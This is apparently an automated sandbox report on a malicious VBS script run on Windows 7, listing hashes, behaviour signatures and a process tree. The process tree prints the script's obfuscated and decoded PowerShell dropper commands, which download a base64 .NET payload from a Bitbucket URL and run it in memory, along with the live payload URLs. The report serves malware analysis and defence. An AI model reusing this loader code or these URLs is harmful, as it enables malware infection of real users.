Overview

overview

10

Static

static

1

43a46c8866...ae.vbs

windows7-x64

10

43a46c8866...ae.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    21-08-2024 10:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    43a46c8866fdd9b7fb23d0d2ab7a2676f0637333e500cf4e32ae3bc0b88028ae.vbs

  • Size

    2.7MB

  • MD5

    b6a6e732e7843e8af8468793eaaa294f

  • SHA1

    4de793698450915e784e3a7f9df99b5b74241979

  • SHA256

    43a46c8866fdd9b7fb23d0d2ab7a2676f0637333e500cf4e32ae3bc0b88028ae

  • SHA512

    e37f804bb9020e51ac1ba8381aeda15ad5a2dde6ac875478fe0c5e6d3dbcebc38b6ee752604b21174b8198752219ed98e4bd423a0c24e1fa541d2d18c89b6e24

  • SSDEEP

    768:pddddduddddddddduddddddddduddddddddduddddddddduddddddddduddddddo:TVKgi

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://bitbucket.org/556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43a46c8866fdd9b7fb23d0d2ab7a2676f0637333e500cf4e32ae3bc0b88028ae.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2716
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bq▒GQ▒aQBs▒Go▒I▒▒9▒C▒▒Jw▒w▒DE▒Jw▒7▒CQ▒bwBv▒Gc▒dQB2▒C▒▒PQ▒g▒Cc▒JQBw▒Ho▒QQBj▒E8▒ZwBJ▒G4▒TQBy▒CU▒Jw▒7▒Fs▒QgB5▒HQ▒ZQBb▒F0▒XQ▒g▒CQ▒Z▒Bu▒Hk▒c▒B5▒C▒▒PQ▒g▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBD▒G8▒bgB2▒GU▒cgB0▒F0▒Og▒6▒EY▒cgBv▒G0▒QgBh▒HM▒ZQ▒2▒DQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒g▒Cg▒TgBl▒Hc▒LQBP▒GI▒agBl▒GM▒d▒▒g▒E4▒ZQB0▒C4▒VwBl▒GI▒QwBs▒Gk▒ZQBu▒HQ▒KQ▒u▒EQ▒bwB3▒G4▒b▒Bv▒GE▒Z▒BT▒HQ▒cgBp▒G4▒Zw▒o▒Cc▒a▒B0▒HQ▒c▒Bz▒Do▒Lw▒v▒GI▒aQB0▒GI▒dQBj▒Gs▒ZQB0▒C4▒bwBy▒Gc▒Lw▒1▒DU▒NgBn▒Gg▒ZgBo▒Gc▒ZgBo▒Gc▒Zg▒v▒GY▒Z▒Bz▒GY▒Z▒Bz▒GY▒LwBk▒G8▒dwBu▒Gw▒bwBh▒GQ▒cw▒v▒GQ▒b▒Bs▒Gg▒bwBw▒GU▒LgB0▒Hg▒d▒▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒Z▒Bu▒Hk▒c▒B5▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒w▒C8▒S▒BP▒Hk▒ZQB4▒C8▒cg▒v▒GU▒ZQ▒u▒GU▒d▒Bz▒GE▒c▒▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒G8▒bwBn▒HU▒dg▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒agBk▒Gk▒b▒Bq▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\43a46c8866fdd9b7fb23d0d2ab7a2676f0637333e500cf4e32ae3bc0b88028ae.vbs');powershell -command $KByHL;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1656
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$jdilj = '01';$ooguv = 'C:\Users\Admin\AppData\Local\Temp\43a46c8866fdd9b7fb23d0d2ab7a2676f0637333e500cf4e32ae3bc0b88028ae.vbs';[Byte[]] $dnypy = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://bitbucket.org/556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt'));[system.AppDomain]::CurrentDomain.Load($dnypy).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('0/HOyex/r/ee.etsap//:sptth' , $ooguv , '_______________________-------------', $jdilj, '1', 'Roda' ));"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2800

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KF0HK8D6RWIFFU5I9K1O.temp
    Filesize

    7KB

    MD5

    517c7fc400ea40ccdc305fe5c0a979b3

    SHA1

    68ac047043dba1ff6dd61f001722174ae5482733

    SHA256

    3c8d244f509d48df085b504badb1c704e544a1b141ec053b9ddf0110404f9345

    SHA512

    3cb3a7bb2103964a1bf017f0e2bacdd9d65d725bb1b3d0549c2946b1b8358ea4f05e573f0479cab65cc8701f54e29846836887981993bc9437793aab00feac74

    Download Submit

  • memory/1656-10-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1656-9-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1656-8-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1656-7-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1656-6-0x0000000002350000-0x0000000002358000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1656-5-0x000000001B530000-0x000000001B812000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1656-4-0x000007FEF5AAE000-0x000007FEF5AAF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1656-16-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

    Filesize

    9.6MB

    Download